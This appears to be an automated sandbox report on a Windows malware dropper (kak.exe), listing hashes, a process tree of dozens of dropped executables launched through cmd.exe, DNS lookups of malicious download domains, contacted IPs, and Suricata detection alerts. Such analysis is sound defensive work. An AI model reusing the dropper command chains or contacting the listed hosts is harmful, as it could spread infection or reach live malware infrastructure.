Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Nov. 5, 2021, 9:05 a.m.	Nov. 5, 2021, 9:07 a.m.

Size	748.7KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`3b25bb47c77da6404c1b75133ccf2b1f`
SHA256	`e9a3c66d5e14cf9e6a50183cbd85e3b2ea157094f7f65c7666a0ff20cf1c73e3`
CRC32	`A113FFD8`
ssdeep	`6144:d/QiQXC3tQQ5m+ksmpk3U9j0Im4soxvjFEOTb9WmZX/8shzdsY4CpHPhnTxnV1:VQi3mQc6m6UR0Ilp1hf39Wkv8xwJBn`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file

kak.exe "C:\Users\test22\AppData\Local\Temp\kak.exe"
2336
- kak.tmp "C:\Users\test22\AppData\Local\Temp\is-0EQ3T.tmp\kak.tmp" /SL5="$3002C,506127,422400,C:\Users\test22\AppData\Local\Temp\kak.exe"
  2416
  - DYbALA.exe "C:\Users\test22\AppData\Local\Temp\is-BI6MO.tmp\DYbALA.exe" /S /UID=2709
    2560
    - Lixygaevymi.exe "C:\Users\test22\AppData\Local\Temp\ab-479ac-814-bb8a8-11130f0847f23\Lixygaevymi.exe"
      2724
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        2548
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2548 CREDAT:145409
        2672
    - Hyvacaerufe.exe "C:\Users\test22\AppData\Local\Temp\4a-841a7-6ec-3f1a8-c322fd916228f\Hyvacaerufe.exe"
      2832
      - cmd.exe "C:\Windows\System32\cmd.exe" /k C:\Users\test22\AppData\Local\Temp\3a4dsbox.5nj\ww15_testLL_0310_single.exe & exit
        812
        
        ww15_testLL_0310_single.exe C:\Users\test22\AppData\Local\Temp\3a4dsbox.5nj\ww15_testLL_0310_single.exe
        2436
        
        Yy1UpurwsHhgAxyvFO1fsEJc.exe "C:\Users\test22\Pictures\Adobe Films\Yy1UpurwsHhgAxyvFO1fsEJc.exe"
        3528
        
        xQPPSQ1BqNk9eqt6i4rvB9H7.exe "C:\Users\test22\Pictures\Adobe Films\xQPPSQ1BqNk9eqt6i4rvB9H7.exe"
        3480
        
        csoCH3pRbI_GagnhR3A9twXi.exe "C:\Users\test22\Pictures\Adobe Films\csoCH3pRbI_GagnhR3A9twXi.exe"
        3540
        
        tqfipZFUbzH_ujfiAYSlnmpT.exe "C:\Users\test22\Pictures\Adobe Films\tqfipZFUbzH_ujfiAYSlnmpT.exe"
        2912
        
        zl1mb9Yk6lVkb6lKpr0u1iAW.exe "C:\Users\test22\Pictures\Adobe Films\zl1mb9Yk6lVkb6lKpr0u1iAW.exe"
        1028
        
        jg1_1faf.exe "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
        4472
        
        cutm3.exe "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
        4656
        
        60K7gDPwg8mtUnq7PXG9pdlx.exe "C:\Users\test22\Pictures\Adobe Films\60K7gDPwg8mtUnq7PXG9pdlx.exe"
        2244
        
        2EEBa_J1cdykvsX9ogWTty98.exe "C:\Users\test22\Pictures\Adobe Films\2EEBa_J1cdykvsX9ogWTty98.exe"
        4240
      - cmd.exe "C:\Windows\System32\cmd.exe" /k C:\Users\test22\AppData\Local\Temp\wdg0lsza.mbf\BumperWW.exe & exit
        1772
        
        BumperWW.exe C:\Users\test22\AppData\Local\Temp\wdg0lsza.mbf\BumperWW.exe
        2552
        
        Yy1UpurwsHhgAxyvFO1fsEJc.exe "C:\Users\test22\Pictures\Adobe Films\Yy1UpurwsHhgAxyvFO1fsEJc.exe"
        3568
        
        csoCH3pRbI_GagnhR3A9twXi.exe "C:\Users\test22\Pictures\Adobe Films\csoCH3pRbI_GagnhR3A9twXi.exe"
        1584
        
        An8eXpLsiRZjE_jKCIY0weAL.exe "C:\Users\test22\Pictures\Adobe Films\An8eXpLsiRZjE_jKCIY0weAL.exe"
        3800
        
        An8eXpLsiRZjE_jKCIY0weAL.exe "C:\Users\test22\Pictures\Adobe Films\An8eXpLsiRZjE_jKCIY0weAL.exe"
        4452
        
        zCTtYs2X6MIXPu1iAb3QcQKE.exe "C:\Users\test22\Pictures\Adobe Films\zCTtYs2X6MIXPu1iAb3QcQKE.exe"
        3864
        
        vFZoCgl35XxVzh8qqcJB1_ox.exe "C:\Users\test22\Pictures\Adobe Films\vFZoCgl35XxVzh8qqcJB1_ox.exe"
        3860
        
        11E7MDGSktAZAwVCAJlPDyeF.exe "C:\Users\test22\Pictures\Adobe Films\11E7MDGSktAZAwVCAJlPDyeF.exe"
        3900
        
        proliv041.exe C:\Users\test22\AppData\Roaming\proliv041.exe
        4768
        
        xQPPSQ1BqNk9eqt6i4rvB9H7.exe "C:\Users\test22\Pictures\Adobe Films\xQPPSQ1BqNk9eqt6i4rvB9H7.exe"
        3688
        
        Z7cnF_KncwQG5qs37FHAoOtp.exe "C:\Users\test22\Pictures\Adobe Films\Z7cnF_KncwQG5qs37FHAoOtp.exe"
        3440
        
        sRJwwLbHRcg3hgOoQ2d7FGcu.exe "C:\Users\test22\Pictures\Adobe Films\sRJwwLbHRcg3hgOoQ2d7FGcu.exe"
        3328
        
        Ii72a58i44lVrXJwb4bUZxN2.exe "C:\Users\test22\Pictures\Adobe Films\Ii72a58i44lVrXJwb4bUZxN2.exe"
        3492
        
        1AI7Qh_cSRFpTbDT02aao5Mm.exe "C:\Users\test22\Pictures\Adobe Films\1AI7Qh_cSRFpTbDT02aao5Mm.exe"
        4404
      - cmd.exe "C:\Windows\System32\cmd.exe" /k C:\Users\test22\AppData\Local\Temp\cxkdphvb.w33\any.exe & exit
        3324
        
        any.exe C:\Users\test22\AppData\Local\Temp\cxkdphvb.w33\any.exe
        3384
        
        any.exe "C:\Users\test22\AppData\Local\Temp\cxkdphvb.w33\any.exe" -u
        3452
      - cmd.exe "C:\Windows\System32\cmd.exe" /k C:\Users\test22\AppData\Local\Temp\tx20rfg2.f30\customer51.exe & exit
        3648
        
        customer51.exe C:\Users\test22\AppData\Local\Temp\tx20rfg2.f30\customer51.exe
        3712
      - cmd.exe "C:\Windows\System32\cmd.exe" /k C:\Users\test22\AppData\Local\Temp\wpr4byow.xse\gcleaner.exe /mixfive & exit
        3788
        
        gcleaner.exe C:\Users\test22\AppData\Local\Temp\wpr4byow.xse\gcleaner.exe /mixfive
        3848
      - cmd.exe "C:\Windows\System32\cmd.exe" /k C:\Users\test22\AppData\Local\Temp\0euy33ek.tqo\autosubplayer.exe /S & exit
        3908
      - cmd.exe "C:\Windows\System32\cmd.exe" /k C:\Users\test22\AppData\Local\Temp\mnykrj0q.fnf\installer.exe /qn CAMPAIGN=654 & exit
        3792
        
        installer.exe C:\Users\test22\AppData\Local\Temp\mnykrj0q.fnf\installer.exe /qn CAMPAIGN=654
        4168
    - foldershare.exe "C:\Program Files\Windows Defender\EOUZNQTEXE\foldershare.exe" /VERYSILENT
      2916
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
requestimedout.com	A 162.255.117.78	162.255.117.78
apps.identrust.com	CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 96.16.99.73 A 96.16.99.43 A 23.216.159.9 A 23.216.159.81	23.216.159.81
twitter.com	A 104.244.42.65 A 104.244.42.193	104.244.42.65
www.hzradiant.com	A 194.163.158.120	194.163.158.120
ipinfo.io	A 34.117.59.81	34.117.59.81
connectini.net	A 162.0.210.44	162.0.210.44
file.ekkggr3.com	A 104.21.66.169 A 172.67.162.110	172.67.162.110
telegram.org	A 149.154.167.99	149.154.167.99
eguntong.com	A 194.87.185.127	194.87.185.127
ip-api.com	A 208.95.112.1	208.95.112.1
www.listincode.com	A 149.28.253.196	149.28.253.196
www.mrwenshen.com	A 103.155.92.29	103.155.92.29
yandex.ru	A 77.88.55.66 A 5.255.255.60 A 5.255.255.50 A 77.88.55.50	77.88.55.50
htagzdownload.pw	A 35.205.61.67	35.205.61.67
google.com	A 142.250.207.78	172.217.161.78
privacytoolzfor-you6000.top	A 5.8.76.207	5.8.76.207
litidack.com	A 172.67.128.223 A 104.21.2.71	104.21.2.71
iplogger.org	A 88.99.66.31	88.99.66.31
www.profitabletrustednetwork.com	A 192.243.59.12 A 192.243.59.13	192.243.59.12
staticimg.youtuuee.com	A 45.136.151.102	45.136.151.102
el5en1977834657.s3.ap-south-1.amazonaws.com	CNAME s3-r-w.ap-south-1.amazonaws.com A 52.219.66.30 A 52.219.156.18	52.219.158.22
d.gogamed.com	A 104.21.59.236 A 172.67.185.110	104.21.59.236
tambisup.com	A 91.206.15.183 A 2.57.90.16	91.206.15.183
dataonestorage.com	A 45.142.182.152	45.142.182.152
f.gogamef.com	A 104.21.72.228 A 172.67.136.94	172.67.136.94
dumancue.com	A 172.67.134.37 A 104.21.6.12	172.67.134.37
www.google.com	A 142.250.204.68	172.217.175.228
source3.boys4dayz.com	A 172.67.148.61 A 104.21.33.188	104.21.33.188
t.gogamec.com	A 172.67.204.112 A 104.21.85.99	104.21.85.99
cloutingservicedb.su	A 172.67.145.75 A 104.21.39.127	104.21.39.127
fouratlinks.com	A 199.192.17.247	199.192.17.247
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.134.233

IP Address	Status	Action
103.155.92.29	Active	Moloch
104.21.59.236	Active	Moloch
104.21.66.169	Active	Moloch
104.21.72.228	Active	Moloch
104.244.42.193	Active	Moloch
104.244.42.65	Active	Moloch
142.250.204.68	Active	Moloch
142.250.207.78	Active	Moloch
149.154.167.99	Active	Moloch
149.28.253.196	Active	Moloch
162.0.210.44	Active	Moloch
162.159.135.233	Active	Moloch
162.255.117.78	Active	Moloch
164.124.101.2	Active	Moloch
172.67.128.223	Active	Moloch
172.67.134.37	Active	Moloch
172.67.145.75	Active	Moloch
172.67.148.61	Active	Moloch
172.67.204.112	Active	Moloch
186.2.171.3	Active	Moloch
192.243.59.12	Active	Moloch
193.56.146.36	Active	Moloch
194.163.158.120	Active	Moloch
194.87.185.127	Active	Moloch
199.192.17.247	Active	Moloch
2.56.59.42	Active	Moloch
208.95.112.1	Active	Moloch
212.192.241.15	Active	Moloch
212.193.30.113	Active	Moloch
23.216.159.81	Active	Moloch
34.117.59.81	Active	Moloch
35.205.61.67	Active	Moloch
45.133.1.107	Active	Moloch
45.133.1.182	Active	Moloch
45.136.151.102	Active	Moloch
45.142.182.152	Active	Moloch
45.9.20.156	Active	Moloch
5.8.76.207	Active	Moloch
52.219.156.18	Active	Moloch
52.219.66.30	Active	Moloch
88.99.66.31	Active	Moloch
96.16.99.73	Active	Moloch
77.88.55.50	Active	Moloch
77.88.55.66	Active	Moloch
91.206.15.183	Active	Moloch
94.26.249.132	Active	Moloch
95.217.123.66	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 199.192.17.247:80 -> 192.168.56.103:49163	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 199.192.17.247:80 -> 192.168.56.103:49169	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 199.192.17.247:80 -> 192.168.56.103:49169	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 199.192.17.247:80 -> 192.168.56.103:49167	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 199.192.17.247:80 -> 192.168.56.103:49167	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49189 -> 192.243.59.12:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49209 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 199.192.17.247:80 -> 192.168.56.103:49169	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 162.0.210.44:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49190 -> 192.243.59.12:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49208 -> 162.0.210.44:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 162.0.210.44:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 199.192.17.247:80 -> 192.168.56.103:49169	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 162.0.210.44:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49224 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.159.135.233:80 -> 192.168.56.103:49224	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49227 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49227 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49229 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49223 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49223 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:51084 -> 164.124.101.2:53	2016778	ET DNS Query to a *.pw domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.103:49221 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49215 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49225 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.159.135.233:80 -> 192.168.56.103:49225	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49230 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49237 -> 104.21.59.236:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49235 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49235 -> 34.117.59.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.103:49235	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49236 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49236 -> 34.117.59.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 45.133.1.107:80 -> 192.168.56.103:49239	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 45.133.1.107:80 -> 192.168.56.103:49239	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49226 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49232 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.103:49236	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49220 -> 212.192.241.15:80	2034192	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin	A Network Trojan was detected
TCP 192.168.56.103:49220 -> 212.192.241.15:80	2034192	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin	A Network Trojan was detected
TCP 192.168.56.103:49246 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 104.21.66.169:80 -> 192.168.56.103:49247	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 104.21.66.169:80 -> 192.168.56.103:49247	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49268 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49268 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49276 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49280 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.159.135.233:80 -> 192.168.56.103:49280	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49294 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.159.135.233:80 -> 192.168.56.103:49294	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49273 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49295 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49292 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49292 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49299 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49299 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 45.9.20.156:80 -> 192.168.56.103:49255	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 45.9.20.156:80 -> 192.168.56.103:49255	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 45.9.20.156:80 -> 192.168.56.103:49255	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 45.9.20.156:80 -> 192.168.56.103:49255	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.103:49304 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49304 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49305 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.159.135.233:80 -> 192.168.56.103:49305	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49308 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.159.135.233:80 -> 192.168.56.103:49308	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49310 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 45.133.1.107:80 -> 192.168.56.103:49240	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.103:49222 -> 212.192.241.15:80	2034192	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin	A Network Trojan was detected
TCP 45.133.1.107:80 -> 192.168.56.103:49240	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 45.133.1.107:80 -> 192.168.56.103:49240	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49319 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49319 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49321 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49238 -> 104.21.72.228:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49222 -> 212.192.241.15:80	2034192	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin	A Network Trojan was detected
TCP 192.168.56.103:49263 -> 172.67.145.75:80	2014170	ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related	Potentially Bad Traffic
TCP 192.168.56.103:49274 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49274 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49285 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49291 -> 193.56.146.36:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 193.56.146.36:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.103:49254 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49252 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49262 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49264 -> 212.192.241.15:80	2034192	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin	A Network Trojan was detected
TCP 192.168.56.103:49334 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49265 -> 212.192.241.15:80	2034192	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin	A Network Trojan was detected
TCP 192.168.56.103:49326 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49272 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49272 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49258 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.159.135.233:80 -> 192.168.56.103:49281	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49284 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
UDP 192.168.56.103:50676 -> 8.8.8.8:53	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	Potentially Bad Traffic
TCP 192.168.56.103:49256 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49339 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49339 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49267 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49271 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49271 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49340 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49277 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49277 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49279 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49279 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49293 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49293 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49282 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.159.135.233:80 -> 192.168.56.103:49282	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49286 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49287 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49287 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.159.135.233:80 -> 192.168.56.103:49296	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49298 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49311 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49298 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49301 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49306 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49306 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49307 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49307 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49309 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49317 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49317 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49315 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49315 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49318 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49318 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49303 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49302 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49302 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49316 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
